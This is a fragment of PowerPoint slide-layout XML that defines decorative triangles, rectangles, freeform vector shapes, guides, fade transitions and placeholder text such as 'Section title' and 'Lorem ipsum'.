                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC50C8EF-26CF-4E6E-B3E2-6EA3E480DA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5138057"/>
            <a:ext cx="9896475" cy="1719943"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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8" name="Right Triangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449487D0-1227-4FA6-93A6-AA2BF39AF92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3789946" y="-3"/>
            <a:ext cx="8402048" cy="1864898"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2695076"/>
              <a:gd name="connsiteX2" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2695076"/>
              <a:gd name="connsiteX2" fmla="*/ 2542668 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 830178 h 2695076"/>
              <a:gd name="connsiteX3" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY4" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 1864898 h 1864898"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 794085 h 1864898"/>
              <a:gd name="connsiteX2" fmla="*/ 2542668 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1864898"/>
              <a:gd name="connsiteX3" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 1864898 h 1864898"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY4" fmla="*/ 1864898 h 186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048" h="1864898">
                <a:moveTo>
                  <a:pt x="0" y="1864898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="794085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8402048" y="1864898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1864898"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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9" name="Isosceles Triangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8978C58-367C-4A24-94B0-42E7856A66C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1019174" y="-9526"/>
            <a:ext cx="8632825" cy="1876425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY0" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX1" fmla="*/ 4311650 w 8623300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1866900"/>
              <a:gd name="connsiteX2" fmla="*/ 8623300 w 8623300"/>
              <a:gd name="connsiteY2" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY3" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY0" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX1" fmla="*/ 2768600 w 8623300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1866900"/>
              <a:gd name="connsiteX2" fmla="*/ 8623300 w 8623300"/>
              <a:gd name="connsiteY2" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY3" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8632825"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1876425"/>
              <a:gd name="connsiteX1" fmla="*/ 2778125 w 8632825"/>
              <a:gd name="connsiteY1" fmla="*/ 9525 h 1876425"/>
              <a:gd name="connsiteX2" fmla="*/ 8632825 w 8632825"/>
              <a:gd name="connsiteY2" fmla="*/ 1876425 h 1876425"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8632825"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1876425"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8632825" h="1876425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2778125" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8632825" y="1876425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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3042986"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2688">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="216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824844"/>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5694965"/>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743943"/>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5859624"/>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899528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224659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991980958"/>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742106691"/>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1958850331"/>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2589551892"/>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563134"/>
            <a:ext cx="11653523" cy="1158793"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7058" spc="-98" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE87A1ED-A21F-400C-BBE4-2677EA72DC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="13716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3CD0CA7D-AA89-48BD-B9E8-B5E9263DA68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1422400"/>
            <a:ext cx="12192000" cy="50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BDB7E37D-7BB1-41F5-8A21-46A55C30C581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="5130800"/>
            <a:ext cx="12192000" cy="1727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345EC240-9C6E-4DD3-A674-4474040A55B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="4914900"/>
            <a:ext cx="12192000" cy="1651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14D16B08-CA74-4C91-A309-ECE2CC0E895D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="4749800"/>
            <a:ext cx="12192000" cy="635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93661319"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2688">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="21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93775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619694"/>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27049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4237395137"/>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404891295"/>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63949" y="289511"/>
            <a:ext cx="11655078" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="938684386"/>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917">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="523">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="293">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53523" cy="2162131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="392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459138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Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090210" y="126993"/>
            <a:ext cx="9043734" cy="6634630"/>
            <a:chOff x="1951" y="0"/>
            <a:chExt cx="5890" cy="4321"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 218"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="2190"/>
              <a:ext cx="5871" cy="2131"/>
              <a:chOff x="1951" y="2190"/>
              <a:chExt cx="5871" cy="2131"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1561" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="219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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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28"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="2202"/>
                <a:ext cx="188" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 86 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 86 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 136 h 220"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 136 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 136 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 136 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 86 h 220"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 86 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 86 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 86 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 136 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 136 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="188" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="2198"/>
                <a:ext cx="154"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Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="219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Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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2" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="2190"/>
                <a:ext cx="219" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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1 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 63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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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6"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="188"/>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200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
